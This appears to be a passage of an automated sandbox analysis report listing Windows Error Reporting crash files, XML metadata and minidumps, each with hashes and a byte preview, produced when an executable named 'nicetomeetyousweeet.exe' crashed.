                                                                            SSDEEP:192:QaUDbJ843B056rxf6js2ZrprzuiFpZ24IO824i:3Au4S56rQjTzuiFpY4IO8M
                                                                            MD5:09476EC30094ECB526D2C9A2FB10A69B
                                                                            SHA1:318EACB53B84EC002D1BD1E825761E5D32ED5DEE
                                                                            SHA-256:8836167F617A074D5EA0DE4B65E21DD6F15ECE28B2403BC5889F57F731EEFEAA
                                                                            SHA-512:6EA7D1F80E404405C570D7745A68187003EED1FD87209D8BA2036F4535E5A8389BD7867EA848B685F1766DA0EC0D4B32DA509F6889001B9D56B77BDEC9505C92
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.3.8.4.7.9.0.9.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.d.a.3.2.c.7.b.-.0.8.c.c.-.4.6.c.c.-.a.b.6.0.-.1.9.b.5.3.c.a.e.a.d.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.4.e.b.a.2.1.-.b.b.5.b.-.4.4.0.1.-.9.9.3.6.-.9.a.2.5.a.b.2.0.e.e.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_c6ca6cea-bb32-4d09-8d20-ec3fc4741382\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9049477793509392
                                                                            Encrypted:false
                                                                            SSDEEP:192:ONDbJ8G3B056rxf6js2ZrprzuiFpZ24IO824i:wuGS56rQjTzuiFpY4IO8M
                                                                            MD5:415B3B42CC9BB3E567181BA555C79F56
                                                                            SHA1:42AF1F58506547D09D2E3F3C9E3087D009DAC995
                                                                            SHA-256:B6D625958177C00FAAAC3EECD9A683D507D96FBBB19DDE1B594D9265DFF52ACD
                                                                            SHA-512:48C6FE74CD875A668B7716ED84CFA1893C2C382129281AB22D7CBC32445CB06DB5AFED5288EF05EE77A696D509A97E606BDB72B3240DDAB2E0C087AA671D1CDC
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.4.4.7.5.3.3.7.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.c.a.6.c.e.a.-.b.b.3.2.-.4.d.0.9.-.8.d.2.0.-.e.c.3.f.c.4.7.4.1.3.8.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.9.3.1.8.3.7.-.6.1.b.a.-.4.3.3.2.-.a.3.8.b.-.1.0.9.f.b.3.a.d.d.7.6.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nicetomeetyouswe_a9481248937ecdfdb938514428d8fc7eeec35ea4_147f691a_cd6f4db8-8963-4409-8d59-0087e896b6e6\Report.wer

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9051100550468161
                                                                            Encrypted:false
                                                                            SSDEEP:192:6jDbJ8O3B056rxf6js2ZrprzuiFpZ24IO824i:SuOS56rQjTzuiFpY4IO8M
                                                                            MD5:A69E6EEB1C8D72A1C0A93F97433D9CC3
                                                                            SHA1:F219BDF26EE264AB28FA008F4D0A8FD4E2C4F4EC
                                                                            SHA-256:AE70EB62CD58F12CE748EA682703BBF374952BDF45AAE943660C64A869D95043
                                                                            SHA-512:A69F8612BDAD12D74BB51E48FFAE52B68C60402DC02DDA35CD26C71121F082BA3F000BE31C4D78C56F4A39FDBCE7F19182E3FE14E026A851AB3B48B5047C0966
                                                                            Malicious:false
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.4.0.2.5.7.3.3.1.9.7.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.6.f.4.d.b.8.-.8.9.6.3.-.4.4.0.9.-.8.d.5.9.-.0.0.8.7.e.8.9.6.b.6.e.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.3.5.a.6.0.6.-.9.c.e.7.-.4.8.7.c.-.9.4.b.e.-.a.f.3.a.9.c.e.6.6.0.3.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.4.-.9.b.8.a.-.f.9.d.3.d.7.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.c.3.7.a.0.d.0.5.5.0.4.c.0.f.2.0.e.4.c.d.9.f.9.0.1.b.6.4.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.c.e.4.c.3.8.0.f.2.7.4.8.f.3.7.5.9.0.4.c.1.7.b.3.8.d.4.f.9.3.e.2.9.4.f.e.f.4.f.6.!.n.i.c.e.t.o.m.e.e.t.y.o.u.s.w.e.e.e.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.n.i.c.e.t.o.m.e.e.t.y.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1057.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7165706584366283
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBD6Us+uYUMaAjAbpBa89bk5sfwsm:R6lXJn6Us3YdaAjAHkSf6
                                                                            MD5:D57B642A782F609471A78D2707608F10
                                                                            SHA1:62242A003CA885FEC10FED0298D21D7D044B3A99
                                                                            SHA-256:5BD9BD06BCD305392D48D6937EA933DCFAA58A39734E78410E9415650E339952
                                                                            SHA-512:39AE1003A3484B1B9FF3FE925F1C977D4E6F4CBD425DAE60EE46BF2C63A90A9FD35D32EBFA51ED4CE7D6A4D14CC4FD666E5EDCB144CC15937AB0F3124F553701
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1077.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487742642654443
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYWPYm8M4JKTBFsF+q8v+TGh0B9ned:uIjfrI7Cj67VuJfKt0B9ned
                                                                            MD5:0832EEB497B8073E610125D6A8C66599
                                                                            SHA1:BD47834D89268AC3B3A4575C1DF0983AEC643F3E
                                                                            SHA-256:C954D1B08AA90F5A8DD0B47A2EF4127B71C400A931FA13B681B9F3F1FDCD1AE2
                                                                            SHA-512:5C3E0A0E8262512C1E648AE15374AA8E0DED0174A92015982D57FA3532CD4C148E12F9F3E53837D667D44695B90976CEB0CB68F8EB4B3B47EDDC36C32DE48887
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER148C.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:48 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64180
                                                                            Entropy (8bit):2.2516145293550895
                                                                            Encrypted:false
                                                                            SSDEEP:192:MNyuX6tlLXFkltG8rmO2gtgyEyWZChsSEh796B/MM25vAaklr+1XLY3hyCHW76y7:wynlBklt9hgrlChsSE5W/6oa9mumg
                                                                            MD5:7D601601B6766EEB470B68354DEF630E
                                                                            SHA1:2F2268BCFCE4FF7ECF4B5F7FAE7609617B92112F
                                                                            SHA-256:182243476C138311569815750F8E6F4F976FC85E8130CA0DE54A4587E173B0B0
                                                                            SHA-512:E7D2C1B4F1FE756FA06EDCFC289A294936C7894A9D2EC1C3E3AB9B66D73ABF1E77E95DA50EA6D13127448A96E44BF1F5EEC9841EFACE2AF6778146B5447C5DB5
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1633.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7169480396323014
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBp6Fs5dYUc0pB089bq5sf4um:R6lXJN6FsDYNiqSfo
                                                                            MD5:58BAAEFFA381D7155D5B4F7B694A3D75
                                                                            SHA1:8B8A9583181159FF735912C56DCBFA6EE3E6EC90
                                                                            SHA-256:7277B98FD50052988BF79916710D5816EC96F5A6764FBC33A867408222417229
                                                                            SHA-512:7A375570D4EEFF074E2E28F61ED62482B57C6CB599EB3331611A15EEDAF3579CC241974793A206AB1863425FE404F1C646C8B70B07029EFDE375CFA709F00C58
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1653.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487707061698159
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYkvYm8M4JKTJFg+q8v+Tuh0B9ned:uIjfrI7Cj67VryJVKF0B9ned
                                                                            MD5:B616FA9DCF303D857270308BAA1D9185
                                                                            SHA1:6D1392A67F2561F06CE3B6EB896F00793391BB08
                                                                            SHA-256:3C05726442FFF1AC426CB928C2F3A6F8EDCB873C465D44D890C9789F22BBD07D
                                                                            SHA-512:ED5604184F9294702752D5452255A94FBA8E8A56CC88B82C54C029E824366C9D2D778198A890484E3F2443EC12D50C97A97355F6BEFEAAB23FCA08CEAE8C680A
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C2D.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:50 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62814
                                                                            Entropy (8bit):2.2405272622817622
                                                                            Encrypted:false
                                                                            SSDEEP:192:qSyuX6tlLXFkltDbgmO2gtg+XBtWOsM1FwXuBkGn2bDaklr+1XLY3hyCHW76Y+C1:JynlBkltDwhgcBxsMw0kRa9m2BNSm
                                                                            MD5:06AA2FFDF75A6895F0E4C97C099E3050
                                                                            SHA1:6B83DB74B7655C52E99D5BDE8C69653CC0C618FD
                                                                            SHA-256:BB4C16992755B7EB7A5B4C1184FE2992EB94475D6C455652561C495FC23ADF0D
                                                                            SHA-512:DF8A9B4B7B00C255D9CD8B01B1D6CD0A3C21F0725144CE9288D71506C1829CF6DE39820C8CEDF478F4887465DF99E8366A019AC94A5DEAE5C6F287F77C0AA624
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CCB.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7168925764724694
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBp6lszdYUMaAjAbpBM89bj5sfJBm:R6lXJN6lsJYdaAjA9jSfu
                                                                            MD5:90B9979FD08A455F162EE4C4C8530D09
                                                                            SHA1:005A12764ED557D7F9F27241CD007F67EE62FF70
                                                                            SHA-256:2A14CFF6CD955776B1BD4A2AD889D9795160116400D677049D5142EC2DE87CE7
                                                                            SHA-512:2AD7F3D9356D64B02354A96190B4757E590789D84017E53BDD35844969C3F15EE3555A40CC7FFE443E47E88CF582D113EE4C77AF9958A56676D7B387B99C3DF9
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CEB.tmp.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.483899486284476
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYaYm8M4JKTBFM+q8v+TGh0B9ned:uIjfrI7Cj67VOJdKt0B9ned
                                                                            MD5:8964194B1E8C38F30B719AA7B47EC401
                                                                            SHA1:A201BD30FF2ACBB46D873A2FBFA41CB3418C616D
                                                                            SHA-256:050B7E1B5468A6A30159FE289423DB5DBBE267DB941217096F37E05E4A6F4A40
                                                                            SHA-512:27E34085B20906B32592A9DBB259C2F07A5A0ADF77637F32DAE0E580568A53F8907D9AEB2AD870B90B38034A25061D84EEC8D4D404DAAEEC7127F3A208E26120
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER2219.tmp.dmp

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:51 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64278
                                                                            Entropy (8bit):2.252791106750497
                                                                            Encrypted:false
                                                                            SSDEEP:192:z1QFyuX6tlLXFkltPjhmO2gtgWEyW9ihsSEPL9qB1xiMO2RyqDaklr+1XLY3hyCt:+ynlBkltPThgXBihsSEDG1ksa9m9GGe
                                                                            MD5:9138A4847919302FE54C3B84FAFC6776
                                                                            SHA1:E1B559860CA7FAF2BDAC700345757217751347B9
                                                                            SHA-256:F8E88EE9BCFA7A1267F04F5D415F12477D481428F9B896A62710D36C3A9A5E02
                                                                            SHA-512:E1E0E334B14251295B00C57168451D39B0A4A49A1BF1813AFC21EE65CEB2AC3C7714106FFCD2E30BF899E136BCB2E3A6D89541F9721D7C754516D86B80222165
                                                                            Malicious:false
                                                                            Preview:MDMP..a..... ........U`g........................P...............:1..........T.......8...........T........... ...............L...........8...............................................................................eJ..............GenuineIntel............T............U`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER22A7.tmp.WERInternalMetadata.xml

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7179689147342896
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBk6EsQrYUc0pB389ba5sf3+m:R6lXJA6EssYNraSf3
                                                                            MD5:FB9BEF18E2E13C198A17069A5EA5A42E
                                                                            SHA1:26BD0C284949DDAC8B196DED7F822E5E7F1BEA76
                                                                            SHA-256:528E469D38727479E099C26664009479842B6F861E9820475144C5898CCDDB90
                                                                            SHA-512:AFEABF2195CD748E320D54D9E7987487F8998A2ED541231D7C5E8385CF16CC6C78BD29A0706BC3595703517508C441E268C3C3D09C401B81B35FA9CDA8C65BBD
                                                                            Malicious:false
